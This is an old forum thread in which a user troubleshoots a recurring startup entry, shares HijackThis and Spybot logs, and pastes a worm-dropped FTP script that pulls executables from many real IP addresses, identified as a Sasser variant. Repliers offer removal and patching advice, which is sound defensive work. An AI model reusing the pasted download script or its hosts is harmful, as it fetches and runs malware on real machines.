I got this file running at startup....

[Mad]

i got this "wkssvr.exe" to be run on startup.
I dont know what is it, but my PC been acting strange since yesterday.

I found it in the registry:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\RunServices]
"Microsoft Updates"="wkssvr.exe"

Is it a virus or something like that??

[Squigi63]

sounds like a virus. I tried google but it pulled up no results and only said it was spelled wrong, so either you have it is spelled wrong or it very new! Have you tried a virus scan. If you don't have one get free-avg off grisoft.com its free and works well.

[RF]

Run Trend-Micro's HouseCall:
http://housecall.trendmicro.com/hous...start_corp.asp

Make sure it isnt in your startup folder. Then go start -> run -> msconfig, hit the startup tab, uncheck your program. If that fails go start->run->services.msc. Find the service and stop/disable it.

[Mad]

I manage to took it await for only a few minutes. I tried Norton Corporate 8.11, adware 6, msconfig, regedit. The damn thing keeps coming back. Now its wkssvrs.exe.
Theres anyway i send this file to Antivirus makers??

[RZetlin]

I did some checking.

Try and look under the directory C:\WINDOWS\System32 for the wkssvr.exe file.

I'm still determining if wkssvr.exe is a virus or not.

[Marbles]

Just looking at the name, it looks like some sort of "server" program. Maybe something to do with MS works.

But it could also be a new trojan. A lot of trojan infections are a 2 or 3 part process. You get a small file off a site, or an attachment. It "phones home" for at least one more program. Eventually one of the "phone home" downloaded programs will install the files and registry entries needed to fully infect the system. When you get rid of the start-up file/entry, the other program just re-instates everything. That's most likely why it keeps coming back on you.

Try to remember everything you did the boot before you noticed the program starting at boot up.

If you have any up-daters set to automatic, this is a good reason (and why I disable them) for manually updating instead. There's no way of knowing where a file has come from with updaters set to auto. It could be a legit MS or Norton file received through an auto-update, or it could be a virus/trojan.

[RZetlin]

Run Hijackthis and post up the log.

[Mad]

Logfile of HijackThis v1.97.7
Scan saved at 00:23:03, on 1/6/2004
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\ARQUIV~1\SYMANT~1\SYMANT~1\DefWatch.exe
C:\ARQUIV~1\SYMANT~1\SYMANT~1\Rtvscan.exe
C:\WINDOWS\System32\nvsvc32.exe
C:\Arquivos de programas\Analog Devices\SoundMAX\SMAgent.exe
C:\ARQUIV~1\SYMANT~1\SYMANT~1\vptray.exe
C:\WINDOWS\System32\ctfmon.exe
C:\Arquivos de programas\VCool_18b10\VCool.exe
C:\WINDOWS\System32\rundll32.exe
C:\Arquivos de programas\RBTray\RBTRAY.EXE
C:\Arquivos de programas\MYIE2\MyIE.exe
C:\Arquivos de programas\GetRight\getright.exe
C:\Arquivos de programas\GetRight\getright.exe
C:\WINDOWS\System32\taskmgr.exe
C:\WINDOWS\system32\cmd.exe
C:\WINDOWS\system32\tftp.exe
D:\Downloads\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer,SearchURL = http://allneedsearch.com/spm.htm
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://allneedsearch.com/spm.htm
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://allneedsearch.com/
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://allneedsearch.com/spm.htm
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://allneedsearch.com/
O1 - Hosts: 200.151.192.5 connect.muonline.com
O2 - BHO: (no name) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Arquivos de programas\Adobe\Acrobat 5.0\Acrobat\ActiveX\AcroIEHelper.ocx
O3 - Toolbar: &Rádio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O4 - HKLM\..\Run: [vptray] C:\ARQUIV~1\SYMANT~1\SYMANT~1\vptray.exe
O4 - HKLM\..\Run: [RivaTunerStartupDaemon] "C:\Arquivos de programas\RivaTuner2.0_12\RivaTuner.exe" /S
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE NvQTwk,NvCplDaemon initialize
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [Microsoft Updates] wkssvr.exe
O4 - HKLM\..\RunServices: [Microsoft Updates] wkssvr.exe
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\Run: [NVIEW] rundll32.exe nview.dll,nViewLoadHook
O4 - Startup: VCool.lnk = C:\Arquivos de programas\VCool_18b10\VCool.exe
O4 - Startup: RBTRAY.lnk = C:\Arquivos de programas\RBTray\RBTRAY.EXE
O8 - Extra context menu item: Add to Ad Hunter - C:\Arquivos de programas\MYIE2\config/blacklist.htm
O8 - Extra context menu item: Download with GetRight - C:\Arquivos de programas\GetRight\GRdownload.htm
O8 - Extra context menu item: E&xportar para o Microsoft Excel - res://C:\ARQUIV~1\MICROS~2\Office10\EXCEL.EXE/3000
O8 - Extra context menu item: Open with GetRight Browser - C:\Arquivos de programas\GetRight\GRbrowse.htm
O9 - Extra 'Tools' menuitem: Sun Java Console (HKLM)
O9 - Extra button: Messenger (HKLM)
O9 - Extra 'Tools' menuitem: Messenger (HKLM)
O12 - Plugin for .spop: C:\Arquivos de programas\Internet Explorer\Plugins\NPDocBox.dll
O14 - IERESET.INF: SEARCH_PAGE_URL=&http://home.microsoft.com/intl/br/access/allinone.asp
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://download.macromedia.com/pub/s...sh/swflash.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{EBECC916-D4C4-4C90-9E97-F4453BF3DCA0}: NameServer = 200.225.159.124 200.225.159.126

[Mad]

more info, from spybot:

DSO Exploit: Data source object exploit (Registry change, nothing done)
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Inter net Settings\Zones\0\1004!=W=3

DSO Exploit: Data source object exploit (Registry change, nothing done)
HKEY_USERS\S-1-5-21-1214440339-725345543-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Int ernet Settings\Zones\0\1004!=W=3

DSO Exploit: Data source object exploit (Registry change, nothing done)
HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Inter net Settings\Zones\0\1004!=W=3

DSO Exploit: Data source object exploit (Registry change, nothing done)
HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Inter net Settings\Zones\0\1004!=W=3

DSO Exploit: Data source object exploit (Registry change, nothing done)
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\Cur rentVersion\Internet Settings\Zones\0\1004!=W=3


--- Spybot - Search && Destroy version: 1.3 ---
2004-05-12 Includes\Cookies.sbi
2004-05-12 Includes\Dialer.sbi
2004-05-12 Includes\Hijackers.sbi
2004-05-12 Includes\Keyloggers.sbi
2004-05-12 Includes\LSP.sbi
2004-05-12 Includes\Malware.sbi
2004-05-12 Includes\Revision.sbi
2004-05-12 Includes\Security.sbi
2004-05-12 Includes\Spybots.sbi
2004-05-12 Includes\Tracks.uti
2004-05-12 Includes\Trojans.sbi

AND YES, my brother just told he he was brownsing for PORN!! 2nd time !!

What should i do now? ALready run norton, adware, hijackthis, spywareblaster and spybot. I clean but spybot always get it back, the info above.

[RZetlin]

You should have ran Spybot Search & Destroy in the first place.

(Smack your brother in the head as well)

Use HiJackthis to remove the following lines:

O4 - HKLM\..\Run: [Microsoft Updates] wkssvr.exe
O4 - HKLM\..\RunServices: [Microsoft Updates] wkssvr.exe


Also removes these items as well.

R1 - HKCU\Software\Microsoft\Internet Explorer,SearchURL = »allneedsearch.com/spm.htm
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = »allneedsearch.com/spm.htm
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = »allneedsearch.com/
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = »allneedsearch.com/spm.htm
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = »allneedsearch.com/
O1 - Hosts: 200.151.192.5 connect.muonline.com


Which items come back when you remove them?

[Mad]

These 2:
O4 - HKLM\..\Run: [Microsoft Updates] wkssvr.exe
O4 - HKLM\..\RunServices: [Microsoft Updates] wkssvr.exe

And the 4 from spybot. As soon it finishes the search, if i do it, the entries are back. Ill have to format my pc, seems to be the only way out.... I already mailed the guys from spybot, waiting for a response.

Oh, and some files are ran randomly, mostly FTP.exe, CMD.exe, LOCATOR.exe, and TFTP.exe.

[WEXP]

Sounds like a virus to me. Microsoft often put "ms" in front of filenames. (but not always) Try booting your computer in safe mode and then remove the keys.

[KujaX]

Or get spybot search and destroy to disable the file at start up you would need to load the advance one

[Mad]

HUM, didnt try safe mode.
Thx ill do it now.
I found this, digging in windows folder.

[Mad]

ive found some more info on the net, in case anyone else had the same problem:
http://www.broadbandreports.com/foru...=flat#10413739

[Mad]

I found the files, and submited to symantec, hope they come with a easy solution quickly.
Its a variant of the damn sasser. It opens a tftp.exe connection and dl itself to the PC. I just dont know how it keeps running on my system, must have changed some service or original .exe.
Heres the content of cmd.ftp, the file which give the directions for dl the sasser:

open 200.151.53.214 5554
anonymous
bin
get 1604_up.exe
bye
open 200.151.119.231 5554
anonymous
bin
get 4565_up.exe
bye
open 65.43.85.80 5554
anonymous
bin
get 25950_up.exe
bye
open 200.151.87.126 5554
anonymous
bin
get 12002_up.exe
bye
open 67.66.200.128 5554
anonymous
bin
get 7038_up.exe
bye
open 200.151.212.57 5554
anonymous
bin
get 30045_up.exe
bye
open 200.151.20.50 5554
anonymous
bin
get 14740_up.exe
bye
open 200.151.167.51 5554
anonymous
bin
get 24093_up.exe
bye
open 200.151.223.61 5554
anonymous
bin
get 5130_up.exe
bye
open 200.151.142.236 5554
anonymous
bin
get 6202_up.exe
bye
open 200.151.60.254 5554
anonymous
bin
get 21014_up.exe
bye
open 200.151.86.77 5554
anonymous
bin
get 30751_up.exe
bye
open 200.151.20.111 5554
anonymous
bin
get 27242_up.exe
bye
open 200.151.171.252 5554
anonymous
bin
get 21666_up.exe
bye
open 200.151.190.210 5554
anonymous
bin
get 13874_up.exe
bye
open 200.151.125.96 5554
anonymous
bin
get 29748_up.exe
bye
open 200.151.73.100 5554
anonymous
bin
get 3899_up.exe
bye
open 200.234.66.176 1023
anonymous
open 200.151.94.73 5554
anonymous
bin
get 16815_up.exe
bye
open 200.151.25.75 5554
anonymous
bin
get 6540_up.exe
bye
open 200.151.181.96 5554
anonymous
bin
get 18158_up.exe
bye
open 200.151.189.233 5554
anonymous
bin
get 18227_up.exe
bye
open 200.151.183.214 5554
anonymous
bin
get 31923_up.exe
bye
open 200.151.47.81 5554
anonymous
bin
get 21504_up.exe
bye
open 200.151.136.63 5554
anonymous
bin
get 2358_up.exe
bye
open 200.151.69.201 5554
anonymous
bin
get 8942_up.exe
bye
open 200.151.171.13 5554
anonymous
bin
get 468_up.exe
bye
open 200.21.100.140 5554
anonymous
bin
get 6184_up.exe
bye
open 200.151.125.162 5554
anonymous
bin
get 18246_up.exe
bye
open 200.151.178.107 5554
anonymous
bin
get 21997_up.exe
bye
open 200.151.156.35 5554
anonymous
bin
get 10386_up.exe
bye
open 200.151.141.86 1023
anonymous
bin
get 10056_upload.exe
bye
open 200.151.197.178 5554
anonymous
bin
get 20972_up.exe
bye
open 200.151.167.26 5554
anonymous
bin
get 19765_up.exe
bye
open 200.151.110.223 1023
anonymous
bin
get 21543_upload.exe
bye
open 200.150.46.252 5554
anonymous
bin
get 14530_up.exe
bye
open 200.151.25.201 5554
anonymous
bin
get 1495_up.exe
bye
open 200.151.110.203 5554
anonymous
bin
get 27580_up.exe
bye
open 200.151.223.169 5554
anonymous
bin
get 19950_up.exe
bye
open 207.101.233.72 5554
anonymous
bin
get 27175_up.exe
bye
open 200.151.15.137 5554
anonymous
bin
get 3943_up.exe
bye
open 200.151.179.253 5554
anonymous
bin
get 6813_up.exe
bye
open 200.151.3.24 5554
anonymous
bin
get 4546_up.exe
bye
open 200.151.41.135 5554
anonymous
bin
get 18096_up.exe
bye
open 200.151.30.251 5554
anonymous
bin
get 6043_up.exe
bye
open 63.169.164.78 5554
anonymous
bin
get 224_up.exe
bye
open 200.151.224.249 5554
anonymous
bin
get 6268_up.exe
bye
open 200.151.230.55 5554
anonymous
bin
get 24104_up.exe
bye
open 200.151.224.249 5554
anonymous
bin
get 26781_up.exe
bye
open 200.151.71.140 5554
anonymous
bin
get 30190_up.exe
bye
open 200.151.178.253 5554
anonymous
open 200.151.158.132 5554
anonymous
open 200.175.17.140 1023
anonymous
bin
get 18420_upload.exe
bye
open 200.151.189.126 5554
anonymous
bin
get 19603_up.exe
bye
open 200.151.15.237 5554
anonymous
open 200.151.128.211 5554
anonymous
bin
get 8576_up.exe
bye
open 200.138.61.184 5554
anonymous
bin
get 17978_up.exe
bye
open 200.151.122.58 5554
anonymous
bin
get 2252_up.exe
bye
open 200.151.3.13 5554
anonymous
bin
get 14726_up.exe
bye
open 200.151.92.36 5554
anonymous
bin
get 28325_up.exe
bye
open 218.89.70.130 5554
anonymous
open 200.151.81.96 1023
anonymous
bin
get 16058_upload.exe
bye
open 200.151.211.13 1023
anonymous
bin
get 4669_upload.exe
bye
open 66.239.223.25 5554
anonymous
bin
get 12173_up.exe
bye
open 200.151.25.196 5554
anonymous
open 200.151.136.16 1023
anonymous
bin
get 3184_upload.exe
bye
open 222.149.135.45 5554
anonymous
bin
get 12159_up.exe
bye

[Quark]

If it's a Sasser variant, then you must patch your computer before cleaning the virus. It'll simply keep coming back. Go to windowsupdate.com and make sure you download all the Critical Updates.

[MrTeamWork]

Once you clean up this poopy make sure your punish your brother for surfing for porn. If you surf for porn on the net you best be sure you have a working firewall that is set up right, a powerful anti-virus program or 2, and cross checking with Ad-aware and spybot.

[Metalmurphy]

Hum mad... i was gonna post something i found out in another forum... but looking at those screenshots it seems that it was you that posted on another forum! Tried looking in symantec but didnt see any info on it! Gonna search a little deeper

[Marbles]

Quote:

Originally Posted by MrTeamWork

Once you clean up this poopy make sure your punish your brother for surfing for porn.

Punish? I'd just make it impossible for the SOB to use the computer period. Password, chop of his hands, what ever it would take.